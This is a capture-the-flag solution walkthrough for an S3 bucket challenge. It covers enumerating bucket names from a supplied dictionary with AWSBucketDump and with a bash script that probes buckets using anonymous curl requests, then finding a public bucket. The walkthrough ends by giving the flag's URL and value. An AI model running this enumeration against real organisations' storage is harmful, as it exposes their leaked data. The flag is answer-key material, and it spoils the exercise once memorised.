A Bucket Load of Trouble - Solution
Introduction
GlobalButter is launching a new product called 'StarTrekButter'. This will be a subsidiary of GlobalButter.
The admins of 'StarTrekButter' like to use a lot of AWS services, their favorite being Amazon S3.
However, they are very bad at security. Word on the underground is that someone has leaked sensitive files into an S3 bucket and configured it so poorly that it is readable by the public.
Just some additional info, last week two buckets were discovered called 'admin.startrekbutter' and 'hr.startrekbutter'.
Starting point
Download the custom dictionary from the link given below
Update the dictionary to fit the company's naming convention
Your task
Find the name of the misconfigured S3 bucket
Find the 'flag.txt' file in the bucket
Note: Use this custom dictionary stolen from their servers to find the bucket and the flag file. You may have to edit the dictionary to align with the company's naming convention as shown above!
https://s3.amazonaws.com/awscloudsec-ctf-helpfiles/startrekbutter-bucketnames.txt
Walkthrough
Download the dictionary from the URL provided
https://s3.amazonaws.com/awscloudsec-ctf-helpfiles/startrekbutter-bucketnames.txt
Append the notation ".startrekbutter" to each word in the dictionary
Use AWSBucketDump to hunt for these buckets with the custom dictionary and a zero-byte grep file (an empty -g list means no filename filter is applied):
touch s.txt
Pass -D to download the files so that you can check their content offline (this may take some time); -d 1 tells the tool to create a separate results directory per bucket
python AWSBucketDump.py -l startrekbutter-bucketnames.txt -g s.txt -D -d 1
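The two steps above (suffixing each dictionary word and then testing each candidate bucket) can also be done without AWSBucketDump. The script below is an added example written for this walkthrough, not part of the original page or of the AWSBucketDump project. It builds the suffixed wordlist, maps the HTTP status of an unauthenticated GET on https://<bucket>.s3.amazonaws.com/ to a verdict, and extracts object keys from a public listing. The sample words and the sample XML listing are constructed here; the real dictionary is the one at the URL above, and probe_bucket needs network access.

```shell
#!/usr/bin/env bash
# Added example: suffix a wordlist and check S3 bucket names over plain HTTPS.

SUFFIX=".startrekbutter"

# Constructed stand-in for the stolen dictionary (a few words only).
SAMPLE_WORDS="admin
hr
testlab
dev"

# Constructed stand-in for what a public bucket returns on GET /.
SAMPLE_LISTING='<ListBucketResult><Name>testlab.startrekbutter</Name><Contents><Key>COM/flag.txt</Key></Contents><Contents><Key>COM/readme.txt</Key></Contents></ListBucketResult>'

# Append the company suffix to every non-blank word; strips CRs from Windows files.
build_wordlist() {
  printf '%s\n' "$1" | tr -d '\r' | sed '/^[[:space:]]*$/d' | sed "s/\$/$SUFFIX/"
}

# Translate the status code of an anonymous GET on the bucket root into a verdict:
# 200 = listing is public, 403 = bucket exists but is private, 404 = NoSuchBucket,
# 301 = bucket exists in another region (redirect from the global endpoint).
classify_status() {
  case "$1" in
    200) echo "public-listing" ;;
    403) echo "exists-private" ;;
    404) echo "no-such-bucket" ;;
    301) echo "exists-other-region" ;;
    *)   echo "unknown" ;;
  esac
}

# Probe one bucket name (requires network; not used by the offline checks).
probe_bucket() {
  local status
  status=$(curl -s -o /dev/null -w '%{http_code}' "https://$1.s3.amazonaws.com/")
  printf '%s %s\n' "$1" "$(classify_status "$status")"
}

# Pull object keys out of a ListBucketResult document read on stdin.
list_keys() {
  grep -o '<Key>[^<]*</Key>' | sed 's/<Key>//; s/<\/Key>//'
}

# Full run against the real dictionary would be:
#   build_wordlist "$(cat startrekbutter-bucketnames.txt)" | while read -r b; do probe_bucket "$b"; done
# and for a bucket reported as public-listing:
#   curl -s "https://testlab.startrekbutter.s3.amazonaws.com/" | list_keys
```

Only 200 means the misconfiguration the challenge describes; a 403 still tells you the bucket name is taken, which is useful for the next round of guessing but is not a finding on its own.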
If the download is taking too long, simply look through the tool's output for flag.txt
The flag is at http://testlab.startrekbutter.s3.amazonaws.com/COM/flag.txt
The flag is "Buried_Inside_Buckets"